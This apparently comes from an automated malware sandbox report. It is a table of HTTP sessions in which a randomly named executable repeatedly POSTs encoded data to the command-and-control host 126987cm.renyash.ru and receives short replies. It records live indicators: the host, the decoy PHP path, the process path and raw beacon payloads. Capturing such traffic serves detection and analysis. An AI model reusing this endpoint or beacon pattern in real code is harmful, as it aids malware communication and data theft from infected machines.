                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
89          192.168.2.4  50070        172.67.220.198  80                180  C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 21:48:32.178736925 CET  321                OUT        POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:48:32.530608892 CET  1072               OUT
Jan 1, 2025 21:48:32.642127037 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 21:48:32.906758070 CET  806                IN         HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fyguYkhor2soWkc3aIv72097Nyb34TY58dpWcZxEQn0tT%2F8BW8jngtC%2FyM1X%2FsJ0F9p6i6z%2BF1bK8ah6swpTgITN9vQG3aZVpjGzeoR6ZX4wK02sYbq5V4i98078L1UvfX2jfRpM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55eebbf354322-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3629&min_rtt=1586&rtt_var=4682&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=81405&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
90          192.168.2.4  50076        172.67.220.198  80                180  C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 21:48:33.039402008 CET  345                OUT        POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:33.389849901 CET  1072               OUT
Jan 1, 2025 21:48:33.508472919 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 21:48:33.786330938 CET  816                IN         HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:33 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FWQAf%2FttnMRTaUHcRv%2B2HREUDBRx2TY8d73r4LROQZiDWH%2Fx3%2FdSPY7RQRrU0TbaXcyktXxQnGP3d83yrh5kx%2Bt28ag1jG%2By1%2B5b1nspbIXusLJob7MuO2B7OpYn0JycvS1%2FEotG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ef11fcdc324-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4847&min_rtt=1695&rtt_var=6939&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=54252&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
91          192.168.2.4  50082        172.67.220.198  80                180  C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 21:48:33.905030012 CET  345                OUT        POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:34.249186039 CET  1072               OUT
Jan 1, 2025 21:48:34.348190069 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 21:48:34.626310110 CET  803                IN         HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GnmBKmMOR5ptIGKv5ceCl4KnPclc0qf0%2BWo8rmoDvZkRlrAevS6VFJ4sOOoNJkmilkrztvjNnZbuRNzMCVvKXf98zqpMA8dK5gzNcMoHYw5NkP%2FrcyYeTQtYPB0q1JRw2jArDXjD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ef66c35f5f6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2857&min_rtt=1645&rtt_var=3041&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=128725&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
92          192.168.2.4  50088        172.67.220.198  80                180  C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 21:48:34.803487062 CET  345                OUT        POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:35.163047075 CET  1072               OUT
Jan 1, 2025 21:48:35.247693062 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 21:48:35.505773067 CET  803                IN         HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zdfxq2JKabs62nWpI%2FnjLbiCshMNHf2230MDAWWU5oTiosG38Q1FVHBdFVYN7KfF1RjIAuWdejOW5yCp88rshk5WhZAFOPKbzgsbckWomLCcclDhHxMD49YTguLH%2FioN28e2x7gN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55efbffbd435b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2515&min_rtt=1614&rtt_var=2409&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=165364&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
93          192.168.2.4  50093        172.67.220.198  80                180  C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 21:48:35.625643015 CET  345                OUT        POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:35.983638048 CET  1072               OUT
Jan 1, 2025 21:48:36.077939034 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 21:48:36.334625006 CET  807                IN         HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:36 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b7idhmKgNJIPqVWudmNPnlUMDlb5tEqkUA8MBA%2FHB%2BCLqqssZoQqBzbn3%2FWruoGoAzq9k5tkbl4Uh8Jm5955ze4sl5s0SYitbRRrhxAYjG5jiC5qANsm3E4XdCXSIiLYc9Xa%2Fjov"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f012ef90f64-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2337&min_rtt=1727&rtt_var=1868&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=220844&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50099 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:36.463793993 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:36.811822891 CET | 1072 | OUT | Data Raw: 51 51 5b 54 53 41 59 51 5d 56 5b 57 54 58 51 58 58 5c 58 51 5b 5e 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ[TSAYQ]V[WTXQXX\XQ[^WGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0T?Z"">!.+'(^6;+T($W#5R%0!*!(+2:!^&%X*7


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50102 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:36.927000999 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:37.294218063 CET | 1788 | OUT | Data Raw: 54 54 5b 53 53 47 5c 55 5d 56 5b 57 54 59 51 5a 58 54 58 5e 5b 5f 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[SSG\U]V[WTYQZXTX^[_WEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$!'X#2"5=7$(58 <B+6<'V2Z=&=D?._&:!^&%X*3
Jan 1, 2025 21:48:37.392102957 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:37.663213968 CET | 948 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:37 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qn7GvOg4Yq0SlHjZqjPkNwfTqLtumI4esTeWpOxn5PeDkh6XtCMP1TyXd1HRvEahezCtKRiSdptlkzkJGc1opHVa7dqK6NqjBlBSOfwk61rPUK0TRKkyXcb6HtefGfvFAU55yjrh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f096a8778d3-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7984&min_rtt=1980&rtt_var=12750&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=29192&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0e 2a 36 2b 52 20 0c 0c 0f 3d 2b 2b 13 25 22 32 5d 32 23 22 18 3c 06 3b 5d 3c 11 23 09 32 3c 33 02 30 14 35 1a 3f 0b 38 11 3e 36 20 5c 05 1b 3a 07 24 07 2b 1c 26 3b 2d 1e 3d 30 02 5d 37 3f 3e 12 29 0d 20 54 23 3b 2a 03 32 38 3e 0e 24 3a 31 0c 3c 3c 33 15 29 1e 3c 0c 25 17 2a 51 0f 16 3b 0e 29 0e 3a 11 2a 12 28 5a 30 0f 23 03 36 26 22 09 26 3b 34 0e 26 3a 21 05 3f 3d 20 08 22 0d 20 0f 25 3c 2e 13 26 00 2c 0c 2c 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98"*6+R =++%"2]2#"<;]<#2<305?8>6 \:$+&;-=0]7?>) T#;*28>$:1<<3)<%*Q;):*(Z0#6&"&;4&:!?= " %<.&,,:&^ "S?UV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50103 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:37.048434019 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:37.408907890 CET | 1072 | OUT | Data Raw: 54 52 5b 57 53 44 5c 56 5d 56 5b 57 54 55 51 52 58 57 58 59 5b 57 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR[WSD\V]V[WTUQRXWXY[WWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$#[421".8$,_!(+S($$!6(R%32[*&>.<^%:!^&%X*
Jan 1, 2025 21:48:37.495807886 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:37.760916948 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:37 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ot4sRPqdQZBNwEc%2FuS4jYsitpWiccViux2Xpr8uwD0pBOidUjBPMHMV8woHUbzbPzNfDi4QS%2BDixMDbamcFYh7d8aKuSgv8ZrCZUT2oqSZoGPiQBwcevp4XR3p8YVR9Wo0Yk%2FdTw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f0a09e67c99-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2533&min_rtt=1838&rtt_var=2079&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=197297&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50104 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:37.893135071 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:48:38.249381065 CET | 1072 | OUT | Data Raw: 54 51 5b 5f 56 4b 5c 51 5d 56 5b 57 54 5d 51 52 58 50 58 5e 5b 55 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[_VK\Q]V[WT]QRXPX^[UWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$T;X72*5.[0>$^! ?44"5$U05(5!E<>2!^&%X*#
Jan 1, 2025 21:48:38.366071939 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:38.639494896 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:38 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2F%2Fbb%2Bz3MTTphzQUjjs%2FotIfl%2ByveoUePcqtsqmzZFwDmuLaUtyk0S1HylcQJqOCsydbgLSwYWvwWQ0Xf6szlaiI7gpbhdecmpMNGywgcMM49vSHrH2AFZ5nQdZVuMRSXSrDzK6v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f0f7eaf8cd6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3716&min_rtt=2081&rtt_var=4051&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=96274&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50105 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:38.770010948 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:39.124243975 CET | 1072 | OUT | Data Raw: 51 55 5b 52 56 47 5c 56 5d 56 5b 57 54 5b 51 52 58 5d 58 5e 5b 52 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[RVG\V]V[WT[QRX]X^[RWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X32X "">;^$-#8<($;!C;302)&6+3%:!^&%X*
Jan 1, 2025 21:48:39.321049929 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:39.667673111 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:39 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzK%2Bb%2BhG1FSRxCXj0Cn3OlAtmzlDCnfDP2FYfH2QzSayISDn2ULL8FptPeNUofGWM1KEO7Lu3uu1RhAGii%2Bce1DS42YoZz9xKMfUhLqUvZwB2xJNqEaYqLZ%2FHyzX1vqQGg3ze4Ee"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f14cc4e0f69-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3940&min_rtt=1600&rtt_var=5280&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=71843&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 50106 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:39.859203100 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:40.301974058 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:40.331223011 CET | 1072 | OUT | Data Raw: 54 5f 5b 55 56 47 59 55 5d 56 5b 57 54 58 51 5f 58 5d 58 58 5b 57 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[UVGYU]V[WTXQ_X]XX[WWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!3"""=\! 0+!+,?'?#%<30%(6?#1!^&%X*7
Jan 1, 2025 21:48:40.632659912 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:40 GMT
